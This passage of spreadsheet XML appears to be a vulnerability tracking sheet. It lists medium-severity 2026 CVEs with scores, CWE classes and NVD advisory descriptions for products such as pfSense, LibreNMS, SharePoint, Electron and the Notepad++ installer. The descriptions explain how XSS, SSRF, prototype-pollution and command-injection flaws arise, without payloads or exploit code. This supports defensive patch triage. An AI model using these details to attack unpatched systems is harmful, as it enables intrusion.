      <c r="A1915" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38961</t>
        </is>
      </c>
      <c r="C1915" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1915" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1915" s="5" t="inlineStr"/>
      <c r="F1915" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1915" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1915" s="5" t="inlineStr"/>
      <c r="I1915" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1915" s="5" t="inlineStr"/>
      <c r="K1915" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1915" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS) vulnerability in the RSS Widget of Netgate pfSense Plus (versions 26.03, 25.11.1) and pfSense CE (version 2.8.1) allows remote authenticated attackers to inject arbitrary JavaScript via malicious content in an RSS feed title. The injected script executes in the browser of any authenticated user who views the dashboard, due to insufficient sanitization of feed title data before rendering in the widget.</t>
        </is>
      </c>
      <c r="M1915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38961</t>
        </is>
      </c>
    </row>
    <row r="1916">
      <c r="A1916" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45694</t>
        </is>
      </c>
      <c r="C1916" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1916" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1916" s="5" t="inlineStr"/>
      <c r="F1916" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1916" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1916" s="5" t="inlineStr"/>
      <c r="I1916" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1916" s="5" t="inlineStr"/>
      <c r="K1916" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1916" s="5" t="inlineStr">
        <is>
          <t>LibreNMS is a network monitoring system. In versions up to and including 26.4.0, the Proxmox application view is vulnerable to reflected cross-site scripting through the user-supplied instance and vmid GET parameters, which are reflected into the page title without adequate encoding. The parameters are placed into the page title with only strip_tags applied, and the title is then written into an inline document.title assignment through string interpolation, so a single quote terminates the JavaScript string and the remaining input runs as script. An attacker who lures an authenticated user into following a crafted link can execute script in that user's session, enabling actions such as theft of session data. This issue is fixed in version 26.5.0.</t>
        </is>
      </c>
      <c r="M1916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45694</t>
        </is>
      </c>
    </row>
    <row r="1917">
      <c r="A1917" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47880</t>
        </is>
      </c>
      <c r="C1917" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1917" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1917" s="5" t="inlineStr"/>
      <c r="F1917" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1917" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H1917" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_integration</t>
        </is>
      </c>
      <c r="I1917" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1917" s="5" t="inlineStr"/>
      <c r="K1917" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1917" s="5" t="inlineStr">
        <is>
          <t>A producer who can publish to a JMS destination consumed by any Spring Integration JMS inbound component can set String JMS properties named replyChannel, errorChannel, or json__TypeId__ which are copied verbatim into the Spring Integration MessageHeaders.
Spring Integration 7.1.0
Spring Integration 7.0.0 - 7.0.5
Spring Integration 6.5.0 - 6.5.10
Spring Integration 6.4.0 - 6.4.12
Spring Integration 5.5.21 and earlier</t>
        </is>
      </c>
      <c r="M1917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47880</t>
        </is>
      </c>
    </row>
    <row r="1918">
      <c r="A1918" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48483</t>
        </is>
      </c>
      <c r="C1918" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1918" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1918" s="5" t="inlineStr"/>
      <c r="F1918" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1918" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1918" s="5" t="inlineStr"/>
      <c r="I1918" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1918" s="5" t="inlineStr"/>
      <c r="K1918" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1918" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Prior to version 3.17.0, Typebot's WhatsApp status forwarding feature stores a workspace-configured webhook forwarding URL and later POSTs WhatsApp marketing/error status events to it from the server. The stored URL is only validated as a generic URL in settings, but the forwarding code uses the raw `ky` instance instead of the repository's SSRF-protected `safeKy` client. A workspace user who can configure WhatsApp settings can therefore make the Typebot server issue HTTP requests to internal services, private-network hosts, localhost, or metadata-style endpoints whenever the public WhatsApp production webhook receives a status payload that should be forwarded. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M1918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48483</t>
        </is>
      </c>
    </row>
    <row r="1919">
      <c r="A1919" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54553</t>
        </is>
      </c>
      <c r="C1919" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1919" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1919" s="5" t="inlineStr"/>
      <c r="F1919" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1919" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1919" s="5" t="inlineStr"/>
      <c r="I1919" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1919" s="5" t="inlineStr"/>
      <c r="K1919" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-248, CWE-639</t>
        </is>
      </c>
      <c r="L1919" s="5" t="inlineStr">
        <is>
          <t>Starlette-Admin is a fast, beautiful and extensible administrative interface framework for FastAPI and Starlette applications. Prior to 0.16.1, the list API does not validate user-supplied order_by and structured where field names against the configured sortable_fields and searchable_fields allowlists. An authenticated user with access to an affected list endpoint can submit arbitrary field names to starlette_admin/base.py and the BaseModelView validation path, bypassing restrictions presented by the administrative user interface. Requests can sort or filter on fields that are not intended to be sortable or searchable, causing limited information exposure. Invalid field names and special Python attribute names such as metadata and the class dunder attribute can also trigger unhandled exceptions and HTTP 500 responses, causing limited denial of service for targeted requests. This issue is fixed in version 0.16.1.</t>
        </is>
      </c>
      <c r="M1919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54553</t>
        </is>
      </c>
    </row>
    <row r="1920">
      <c r="A1920" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55779</t>
        </is>
      </c>
      <c r="C1920" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1920" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1920" s="5" t="inlineStr"/>
      <c r="F1920" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1920" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1920" s="5" t="inlineStr"/>
      <c r="I1920" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1920" s="5" t="inlineStr"/>
      <c r="K1920" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1920" s="5" t="inlineStr">
        <is>
          <t>Silverstripe Versioned provides versioning for Silverstripe models. Prior to 3.2.1, RestoreAction::getRestoreMessage() in src/RestoreAction.php builds ArchiveAdmin restore notifications rendered as CAST_HTML and inserts $restoredItem-&gt;Title, $restoredItem-&gt;URLSegment, $restoredItem-&gt;CMSEditLink(), and $changedProperty['value'] without applying Convert::raw2xml(). When an administrator restores an archived page containing a crafted title or URL segment, the generated restoration message can execute stored JavaScript in the administrator's browser, compromising the confidentiality and integrity of the CMS session. This issue is fixed in version 3.2.1.</t>
        </is>
      </c>
      <c r="M1920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55779</t>
        </is>
      </c>
    </row>
    <row r="1921">
      <c r="A1921" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62324</t>
        </is>
      </c>
      <c r="C1921" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1921" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1921" s="5" t="inlineStr"/>
      <c r="F1921" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1921" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1921" s="5" t="inlineStr"/>
      <c r="I1921" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1921" s="5" t="inlineStr"/>
      <c r="K1921" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-83</t>
        </is>
      </c>
      <c r="L1921" s="5" t="inlineStr">
        <is>
          <t>Jodit Editor is a WYSIWYG editor with a built-in file browser &amp; image editor. Prior to 4.12.31, Jodit's sanitizeHTMLElement method fails to use isDangerousUrl to normalize javascript: href values before checking the scheme, allowing case variants, control-byte prefixes, and embedded tabs or newlines to bypass filtering and execute attacker-controlled script when a victim clicks a stored link rendered by an application. This issue is fixed in version 4.12.31.</t>
        </is>
      </c>
      <c r="M1921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62324</t>
        </is>
      </c>
    </row>
    <row r="1922">
      <c r="A1922" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69402</t>
        </is>
      </c>
      <c r="C1922" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1922" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1922" s="5" t="inlineStr"/>
      <c r="F1922" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1922" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1922" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I1922" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1922" s="5" t="inlineStr"/>
      <c r="K1922" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1922" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M1922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69402</t>
        </is>
      </c>
    </row>
    <row r="1923">
      <c r="A1923" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69417</t>
        </is>
      </c>
      <c r="C1923" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1923" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1923" s="5" t="inlineStr"/>
      <c r="F1923" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1923" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1923" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I1923" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1923" s="5" t="inlineStr"/>
      <c r="K1923" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1923" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M1923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69417</t>
        </is>
      </c>
    </row>
    <row r="1924">
      <c r="A1924" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69690</t>
        </is>
      </c>
      <c r="C1924" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1924" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1924" s="5" t="inlineStr"/>
      <c r="F1924" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1924" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1924" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I1924" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1924" s="5" t="inlineStr"/>
      <c r="K1924" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1924" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M1924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69690</t>
        </is>
      </c>
    </row>
    <row r="1925">
      <c r="A1925" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70610</t>
        </is>
      </c>
      <c r="C1925" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1925" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1925" s="5" t="inlineStr"/>
      <c r="F1925" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1925" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1925" s="5" t="inlineStr"/>
      <c r="I1925" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1925" s="5" t="inlineStr"/>
      <c r="K1925" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L1925" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.9, 40.9.2, 41.2.2, and 42.0.0-beta.4, objects copied across the contextBridge boundary from untrusted content could carry an attacker-influenced prototype, enabling prototype-pollution-style attacks against preload code despite context isolation being enabled. Apps are only affected if their preload code accepts object arguments from untrusted content and reads properties from them without own-property checks, while apps that only accept primitive arguments or validate object arguments are not affected. This issue is fixed in 39.8.9, 40.9.2, 41.2.2, and 42.0.0-beta.4.</t>
        </is>
      </c>
      <c r="M1925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70610</t>
        </is>
      </c>
    </row>
    <row r="1926">
      <c r="A1926" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70612</t>
        </is>
      </c>
      <c r="C1926" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1926" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1926" s="5" t="inlineStr"/>
      <c r="F1926" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1926" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1926" s="5" t="inlineStr"/>
      <c r="I1926" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1926" s="5" t="inlineStr"/>
      <c r="K1926" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1926" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, requests to open external protocol URLs from web content did not take iframe sandbox restrictions into account, so a sandboxed iframe could cause an OS-registered external application to be launched. The frame sandbox state was also not made available to the app permission handlers, affecting apps that render untrusted content in sandboxed iframes and grant the openExternal permission by default when no setPermissionRequestHandler is installed. This issue is fixed in 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M1926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70612</t>
        </is>
      </c>
    </row>
    <row r="1927">
      <c r="A1927" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71356</t>
        </is>
      </c>
      <c r="C1927" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1927" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1927" s="5" t="inlineStr"/>
      <c r="F1927" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1927" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1927" s="5" t="inlineStr"/>
      <c r="I1927" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1927" s="5" t="inlineStr"/>
      <c r="K1927" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L192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27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71356</t>
        </is>
      </c>
    </row>
    <row r="1928">
      <c r="A1928" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71357</t>
        </is>
      </c>
      <c r="C1928" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1928" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1928" s="5" t="inlineStr"/>
      <c r="F1928" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1928" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1928" s="5" t="inlineStr"/>
      <c r="I1928" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1928" s="5" t="inlineStr"/>
      <c r="K1928" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L192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28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71357</t>
        </is>
      </c>
    </row>
    <row r="1929">
      <c r="A1929" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71388</t>
        </is>
      </c>
      <c r="C1929" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1929" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1929" s="5" t="inlineStr"/>
      <c r="F1929" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1929" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1929" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1929" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1929" s="5" t="inlineStr"/>
      <c r="K1929" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L192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29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71388</t>
        </is>
      </c>
    </row>
    <row r="1930">
      <c r="A1930" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71440</t>
        </is>
      </c>
      <c r="C1930" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1930" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1930" s="5" t="inlineStr"/>
      <c r="F1930" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1930" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1930" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1930" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1930" s="5" t="inlineStr"/>
      <c r="K1930" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L193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930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71440</t>
        </is>
      </c>
    </row>
    <row r="1931">
      <c r="A1931" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71565</t>
        </is>
      </c>
      <c r="C1931" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1931" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1931" s="5" t="inlineStr"/>
      <c r="F1931" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1931" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1931" s="5" t="inlineStr"/>
      <c r="I1931" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1931" s="5" t="inlineStr"/>
      <c r="K1931" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L193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31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71565</t>
        </is>
      </c>
    </row>
    <row r="1932">
      <c r="A1932" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71803</t>
        </is>
      </c>
      <c r="C1932" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1932" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1932" s="5" t="inlineStr"/>
      <c r="F1932" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1932" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1932" s="5" t="inlineStr"/>
      <c r="I1932" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1932" s="5" t="inlineStr"/>
      <c r="K1932" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1932" s="5" t="inlineStr">
        <is>
          <t>money-pos 1.0 contains a stored Cross-Site Scripting (XSS) vulnerability. When processing returns, the backend fails to filter or escape the goodsName parameter, directly concatenating it into the order log description; the frontend subsequently renders this content using v-html. An attacker with product creation privileges can inject a malicious JavaScript payload, causing unauthorized code execution when an administrator views the order logs.</t>
        </is>
      </c>
      <c r="M1932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71803</t>
        </is>
      </c>
    </row>
    <row r="1933">
      <c r="A1933" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72626</t>
        </is>
      </c>
      <c r="C1933" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1933" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1933" s="5" t="inlineStr"/>
      <c r="F1933" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1933" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1933" s="5" t="inlineStr"/>
      <c r="I1933" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1933" s="5" t="inlineStr"/>
      <c r="K1933" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L193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33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72626</t>
        </is>
      </c>
    </row>
    <row r="1934">
      <c r="A1934" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72627</t>
        </is>
      </c>
      <c r="C1934" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1934" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1934" s="5" t="inlineStr"/>
      <c r="F1934" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1934" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1934" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1934" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1934" s="5" t="inlineStr"/>
      <c r="K1934" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L193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34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72627</t>
        </is>
      </c>
    </row>
    <row r="1935">
      <c r="A1935" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73250</t>
        </is>
      </c>
      <c r="C1935" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1935" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1935" s="5" t="inlineStr"/>
      <c r="F1935" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1935" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1935" s="5" t="inlineStr"/>
      <c r="I1935" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1935" s="5" t="inlineStr"/>
      <c r="K1935" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1935" s="5" t="inlineStr">
        <is>
          <t>Notepad++ is a free and open-source source code editor. Prior to 8.9.7, the Notepad++ Windows 11 x64 and ARM64 installer passes the attacker-influenced installation directory `$INSTDIR` from PowerEditor/installer/nppSetup.nsi into a PowerShell `-Command` string used by RegisterMSIX to invoke Add-AppxPackage, allowing PowerShell subexpression syntax such as `$()` in the installation path to execute commands in the installer's security context when the context menu component is selected. This issue is fixed in version 8.9.7.</t>
        </is>
      </c>
      <c r="M1935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73250</t>
        </is>
      </c>
    </row>
    <row r="1936">
      <c r="A1936" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73262</t>
        </is>
      </c>
      <c r="C1936" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1936" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1936" s="5" t="inlineStr"/>
      <c r="F1936" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1936" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1936" s="5" t="inlineStr"/>
      <c r="I1936" s="5" t="inlineStr">
        <is>
